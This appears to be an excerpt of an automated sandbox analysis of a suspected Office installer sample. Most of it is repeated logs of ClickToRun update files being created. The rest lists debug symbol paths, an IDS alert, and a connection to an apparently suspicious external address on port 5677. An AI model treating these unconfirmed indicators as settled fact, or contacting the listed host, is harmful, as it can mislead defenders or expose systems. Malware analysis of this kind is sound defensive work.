    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.ar-sa.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.bg-bg.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.cs-cz.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.da-dk.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.de-de.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.el-gr.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.en-gb.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.en-us.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.es-es.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.es-mx.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.et-ee.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.fi-fi.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.fr-ca.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.fr-fr.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.he-il.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.hi-in.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.hr-hr.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.hu-hu.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.id-id.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.it-it.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.ja-jp.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.kk-kz.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.ko-kr.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.lt-lt.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.lv-lv.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.ms-my.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.nb-no.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.nl-nl.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.pl-pl.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.pt-br.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.pt-pt.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.ro-ro.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.ru-ru.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.sk-sk.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.sl-si.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.sr-latn-rs.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.sv-se.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.th-th.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.tr-tr.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.uk-ua.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.vi-vn.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.zh-cn.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.zh-tw.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RUI.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\ClientCapabilities.jsonJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\ClientEventLogMessages.manJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\concrt140.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\FrequentOfficeUpdateSchedule.xmlJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\i640.cab.catJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\i640.hashJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\InspectorOfficeGadget.exeJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\IntegratedOffice.exeJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\inventory.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\manageability.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\MavInject32.exeJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\msix.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\msvcp140.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\OfficeC2RClient.exeJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\OfficeC2RCom.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\OfficeClickToRun.exeJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\officeinventory.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\OfficeOEMPlugin.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\officesvcmgr.exeJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\officesvcmgrschedule.xmlJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\offreg.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\policy.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\PushRegistrationTask.xmlJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\repoman.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\ServiceWatcherSchedule.xmlJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\SharedPerformance.manJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\SubsystemController.manJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\ucrtbase.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\vccorlib140.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\vcruntime140.dllJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDirectory created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\vcruntime140_1.dllJump to behavior
    PE / OLE file has a valid certificate
    Source: sBvrNv0wtb.exeStatic PE information: certificate valid
    Uses secure TLS version for HTTPS connections
    Source: unknownHTTPS traffic detected: 13.107.246.67:443 -> 192.168.2.6:54614 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 13.107.246.67:443 -> 192.168.2.6:54619 version: TLS 1.2
    Contains modern PE file flags such as dynamic base (ASLR) or NX
    Source: sBvrNv0wtb.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
    Binary contains paths to debug symbols
    Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdb source: OfficeClickToRun.exe, 00000006.00000003.2052145588.00000248C2BE9000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2015189380.00000248C2BBE000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2051796061.00000248C2BC9000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2053954532.00000248C2BFB000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: d:\dbs\el\omr\target\x86\ship\click2run\en-us\SetupBootstrapper.pdb0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 source: sBvrNv0wtb.exe, 00000000.00000003.1320415962.0000019728184000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000002.00000000.1320044762.000000000142B000.00000002.00000001.01000000.00000005.sdmp, 872C.tmp, 00000003.00000000.1321361371.000000000142B000.00000002.00000001.01000000.00000005.sdmp
    Source: Binary string: d:\dbs\el\omr\target\x86\ship\click2run\en-us\SetupBootstrapper.pdb source: sBvrNv0wtb.exe, 00000000.00000003.1320415962.0000019728184000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000002.00000000.1320044762.000000000142B000.00000002.00000001.01000000.00000005.sdmp, 872C.tmp, 00000003.00000000.1321361371.000000000142B000.00000002.00000001.01000000.00000005.sdmp
    Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdbGCTL source: OfficeClickToRun.exe, 00000006.00000003.2052145588.00000248C2BE9000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2015189380.00000248C2BBE000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2051796061.00000248C2BC9000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2053954532.00000248C2BFB000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: rekk.pdb source: sBvrNv0wtb.exe, 00000000.00000003.1313913322.000001972756D000.00000004.00000020.00020000.00000000.sdmp, sBvrNv0wtb.exe, 00000000.00000003.1347329405.000001972797A000.00000004.00000020.00020000.00000000.sdmp, 918D.tmp, 00000004.00000000.1346823200.00007FF7A9234000.00000002.00000001.01000000.00000006.sdmp
    Source: global trafficTCP traffic: 192.168.2.6:49698 -> 141.98.10.54:5677
    Source: global trafficTCP traffic: 192.168.2.6:54520 -> 1.1.1.1:53
    Source: Joe Sandbox ViewIP Address: 13.107.246.67 13.107.246.67
    Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:54614 -> 13.107.246.67:443
    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:54619 -> 13.107.246.67:443
    Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: global trafficHTTP traffic detected: GET /rules/officeclicktorun.exe-Production-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.18526; Pro)Host: otelrules.svc.static.microsoft
    Source: global trafficHTTP traffic detected: GET /rules/officec2rclient.exe-Production-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.18526; Pro)Host: otelrules.svc.static.microsoft
    Source: global trafficDNS traffic detected: DNS query: otelrules.svc.static.microsoft
    Source: sBvrNv0wtb.exe, 00000000.00000003.1320415962.0000019728184000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000002.00000000.1320044762.000000000142B000.00000002.00000001.01000000.00000005.sdmp, 872C.tmp, 00000003.00000000.1321361371.000000000142B000.00000002.00000001.01000000.00000005.sdmpString found in binary or memory: http://127.0.0.1:13556/DataInsiderSlabBehaviorSessionInsiderSlabBehaviorReportedStateInsiderSlabBeha
